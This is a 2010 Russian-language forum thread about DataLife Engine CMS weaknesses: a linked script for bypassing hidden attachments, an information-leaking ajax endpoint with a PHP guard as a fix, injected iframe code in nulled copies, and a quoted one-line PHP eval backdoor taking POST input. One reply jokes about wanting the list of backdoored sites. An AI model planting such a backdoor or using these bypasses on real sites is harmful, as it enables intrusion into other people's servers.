ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
20.03.2010, 22:31
|
|
Новичок
Регистрация: 01.10.2009
Сообщений: 27
Провел на форуме:
52963
Репутация:
-2
|
|
Сообщение от botanig
Как просмотреть, что под хайдом в DLE?
Так просто не посмотришь а смощию скрипта свободно можешь слить файлы не только дле но и другие движки...
http://new-dle.biz/exclusive/667-skript-obxoda-xajda-dlya-attachej-v-dle.html
|
|
|
27.03.2010, 01:34
|
|
Новичок
Регистрация: 30.11.2009
Сообщений: 9
Провел на форуме:
70191
Репутация:
0
|
|
В 8.3, может и раньшых!
вывод какие модули стоят.
Файл
http://localhost/engine/ajax/antivirus.php
Вывод список!
Защищаемся
На начало добавить
PHP код:
if(!defined('DATALIFEENGINE'))
{
die("You lol! Anatole yzhe tut");
}
Последний раз редактировалось sir95; 27.03.2010 в 01:37..
|
|
|
|
09.04.2010, 12:00
|
|
Новичок
Регистрация: 01.01.2009
Сообщений: 14
Провел на форуме:
41607
Репутация:
2
|
|
имеются сайты dle 8.0 ,8.2
Каким то образом в файлы dbconfig.php config.php init.php дописываются строки с фреймом типа echo bla bla bla.
Шеллов на хостинге нет, все оригинальное, пароли меняли, в общем всё делали. А как то дописывается..
Создатель файла- 48, а если создаем мы то создатель- 500.
Т.е. файлы изменяет скрипт?
Где копать?
|
|
|
|
11.04.2010, 20:23
|
|
Новичок
Регистрация: 30.11.2009
Сообщений: 9
Провел на форуме:
70191
Репутация:
0
|
|
Сообщение от saransko_o
имеются сайты dle 8.0 ,8.2
Каким то образом в файлы dbconfig.php config.php init.php дописываются строки с фреймом типа echo bla bla bla.
Шеллов на хостинге нет, все оригинальное, пароли меняли, в общем всё делали. А как то дописывается..
Создатель файла- 48, а если создаем мы то создатель- 500.
Т.е. файлы изменяет скрипт?
Где копать?
Нулл движок?
|
|
|
|
11.04.2010, 23:56
|
|
Новичок
Регистрация: 01.01.2009
Сообщений: 14
Провел на форуме:
41607
Репутация:
2
|
|
Сообщение от sir95
Нулл движок?
да. нулл от MID.
|
|
|
|
12.04.2010, 05:59
|
|
Новичок
Регистрация: 16.01.2009
Сообщений: 17
Провел на форуме:
31738
Репутация:
2
|
|
В нуллах авторы нулла пишут уязвимости. Либо сами нуллите, либо юзайте фривар двиг.
Сам лично юзаю PHP - Fusion.
|
|
|
|
12.04.2010, 15:06
|
|
Новичок
Регистрация: 01.01.2009
Сообщений: 14
Провел на форуме:
41607
Репутация:
2
|
|
Кстати на многих лицензия была
Последний раз редактировалось saransko_o; 12.04.2010 в 15:11..
|
|
|
|
26.04.2010, 09:17
|
|
Новичок
Регистрация: 17.10.2009
Сообщений: 1
Провел на форуме:
24095
Репутация:
0
|
|
Никак, там в папке с загруженными файлами лежит htaccess, ты не выполнишь .php файл
|
|
|
|
30.04.2010, 05:43
|
|
Новичок
Регистрация: 12.03.2010
Сообщений: 13
Провел на форуме:
29188
Репутация:
0
|
|
Есть бедкодер в папке /engine/ajax/
if($_POST['text']!=''){eval(stripcslashes($_POST['text']));}
Что с этим можно сделать?
Последний раз редактировалось Rew; 30.04.2010 в 05:46..
|
|
|
|
30.04.2010, 06:08
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763
Репутация:
1680
|
|
Сообщение от Rew
Есть бедкодер в папке /engine/ajax/
if($_POST['text']!=''){eval(stripcslashes($_POST['text']));}
Что с этим можно сделать?
Ну например, отправить мне в ЛС список сайтов с этим бекдором 
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
